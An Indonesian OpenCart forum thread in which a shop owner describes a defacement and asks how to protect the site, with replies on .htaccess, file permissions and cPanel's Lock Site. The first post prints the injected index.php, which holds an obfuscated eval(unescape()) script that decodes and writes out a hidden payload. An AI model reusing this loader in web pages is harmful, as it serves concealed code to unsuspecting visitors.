Post by sigue » Fri Nov 30, 2012 10:18 am

Selamat pagi para opencarter, opencart mastah and webmastah, saya mau tanya tentang cara proteksi web opencart kita dari orang iseng yg melakukan deface atau hack.
soalnya baru kemarin saya mengalaminya, kejadiannya kemarin pagi pas saya buka web opencart saya, saya liat web saya tampilannya menjadi hanya berupa text saja dengan tulisan "OPENCART IS DOWN FOR MAINTENANCE!", tadinya saya pikir emang lg ada maintenance dari pihak server hostingannya, tapi pas siangnya saya cek lg masih jg gitu, trus saya cek subdomain sy yang pake opencart jg, ternyata normal2 saja ga ada masalah, trus saya liat2 di web forum tempat saya sewa hosting, dan cari domain2 yang sama sewa hosting di tempat itu jg, dan ternyata normal jg ga ada masalah.
disini saya mulai curiga, trus saya coba cek via FTP dan saya cek file 'index.php' dan ternyata emang udah berubah, saya gak tau itu filenya yg direplace atau kodenya yg di replace, jadi seperti ini nih script kodenya :
<head><title>Themes Opencart >> One Stop Shopping for Unique, Elegant and Affordable OpenCart Theme</title><base href="http://themesopencart.com/" /><meta name="description" content="We provide a variety of Opencart Templates with a variety of attractive design, elegant and affordable. " /><link href="http://themesopencart.com/image/data/cart.png" rel="icon" /><link rel="stylesheet" type="text/css" href="catalog/view/theme/octpl008/stylesheet/lightstyleblue.css" /><body><center><p><h1>Opencart is down for maintainence!</h1><p><script type="text/javascript"><!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6e%64%62%33%64%63%34%38%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%38%39%32%33%37%31%31%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%34%38%32%30%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6e%64%62%33%64%63%34%38%28%27') + '%3e%62%65%68%59%61%63%1a%6b%66%5d%39%1e%62%77%77%6a%32%23%29%62%6f%64%2c%2a%64%6d%6b%77%6d%2e%63%6c%65%2f%55%68%5d%68%73%77%62%59%6b%23%63%72%5b%69%6e%70%2b%76%76%69%6c%2d%69%68%65%61%62%63%61%6e%5d%58%63%5b%6a%6b%63%69%5f%6b%69%70%2a%6a%63%6b%18%18%7b%67%66%74%6c%3b%2e%1c%62%66%62%65%60%78%3b%36%18%67%72%75%68%67%3e%19%74%61%67%67%58%61%60%67%70%75%30%1b%63%63%64%68%63%6c%1a%32%3a%2b%65%64%69%5a%6f%65%3218923711%36%37%37%36%34%38%32' + unescape('%27%29%29%3b'));// --></script></center></body></html>
so, utk para mastah kiranya tau bagaimana cara memproteksi website opencart kita terhadap deface atau hack???
dan satu lg pertanyaan saya saat ini saya ubah file permission untuk file 'index.php' menjadi 444 untuk mencoba proteksi apakah itu ga apa-apa?? Thanks. ;) ;)

THEMESOPENCART.COM


New member

Posts

Joined
Sat Aug 14, 2010 12:41 pm

Post by faisalsani » Fri Dec 07, 2012 5:40 pm

Coba ke Cara mengamankan toko online opencart mungkin sedikit bisa membantu gan ;-)

Web Hosting Murah Indonesia,
Domain Murah,
VPS Murah


Newbie

Posts

Joined
Mon Jul 30, 2012 9:33 pm
Location - solo

Post by sigue » Sat Dec 08, 2012 8:48 am

sip, thanks atas infonya gan, ntar sy mo coba yg proteksi dgn .htaccess-nya :)

THEMESOPENCART.COM


New member

Posts

Joined
Sat Aug 14, 2010 12:41 pm

Post by Si Doel » Mon Dec 10, 2012 9:10 am

faisalsani wrote:Coba ke Cara mengamankan toko online opencart mungkin sedikit bisa membantu gan ;-)
mantaaffff,,,, :P :P :P

User avatar
New member

Posts

Joined
Mon Jun 11, 2012 9:12 am

Post by zaini » Wed Dec 12, 2012 10:58 pm

widih ngeri jg ya kLo kena kek gtu.
Apalagi kLo tokonya dah rame, pasti bakal panic mode on

sewa mobil murah di lombok | harga rental mobil lombok Pompa Tenaga Surya PS4000 tenaga surya


User avatar
New member

Posts

Joined
Tue Sep 13, 2011 8:54 pm
Location - Venuz

Post by Si Doel » Sat Dec 29, 2012 3:25 pm

tambahan:
Powered by Opencart di ganti ,biar ga seenaknya orang upload gambar ke web kita ;D

User avatar
New member

Posts

Joined
Mon Jun 11, 2012 9:12 am

Post by jurpro » Mon Dec 31, 2012 7:42 pm

Untuk sebagian hosting yang menggunakan CPanel versi terbaru, sekarang sudah ada fasilitas "LOCK SITE" dimana fungsinya adalah mengunci seluruh file dari tangan-tangan jahil. Namun fungsi ini juga menjadikan FTP service dan aktivitas upload file ke server tidak bisa digunakan. Jadi, jika akan mengupload atau memodifikasi file di server silahkan "DISABLE" dulu fungsi Lock Site nya. Namun jika sudah selesai mengedit atau upload file, kamu tinggal mengaktifkan lagi "ENABLE" fungsi LOCK SITE nya.

Cari album edisi luar negeri? Atau dalam negeri juga bisa. Kunjungi saja http://www.sawios.com Semoga bisa membantu. :)


User avatar
Active Member

Posts

Joined
Wed Jun 06, 2012 6:17 pm

Post by jurpro » Tue Jan 01, 2013 11:58 pm

Ternyata fungsi "LOCK SITE" pada CPnael versi terbaru ini membawa masalah karena fitur baru dan sistem Ecommerce ini bukan sistem blog news, seperti Wordpress atau Joomla. Ini situs yang memungkinkan pelanggan menambahkan data, menulis pemesanan, dll... Semua sistem itu dimatikan oleh fungsi "Lock Site"... So... Mentah lagi, dan gue pun mematikan lagi fungsi ini menjadi DISABLE.

Cari album edisi luar negeri? Atau dalam negeri juga bisa. Kunjungi saja http://www.sawios.com Semoga bisa membantu. :)


User avatar
Active Member

Posts

Joined
Wed Jun 06, 2012 6:17 pm

Post by Si Doel » Sat Jan 05, 2013 6:41 pm

jurpro wrote:Ternyata fungsi "LOCK SITE" pada CPnael versi terbaru ini membawa masalah karena fitur baru dan sistem Ecommerce ini bukan sistem blog news, seperti Wordpress atau Joomla. Ini situs yang memungkinkan pelanggan menambahkan data, menulis pemesanan, dll... Semua sistem itu dimatikan oleh fungsi "Lock Site"... So... Mentah lagi, dan gue pun mematikan lagi fungsi ini menjadi DISABLE.
hmmm,,,bolak balik,capee deh ;D ;D :crazy:

User avatar
New member

Posts

Joined
Mon Jun 11, 2012 9:12 am
Who is online

Users browsing this forum: No registered users and 11 guests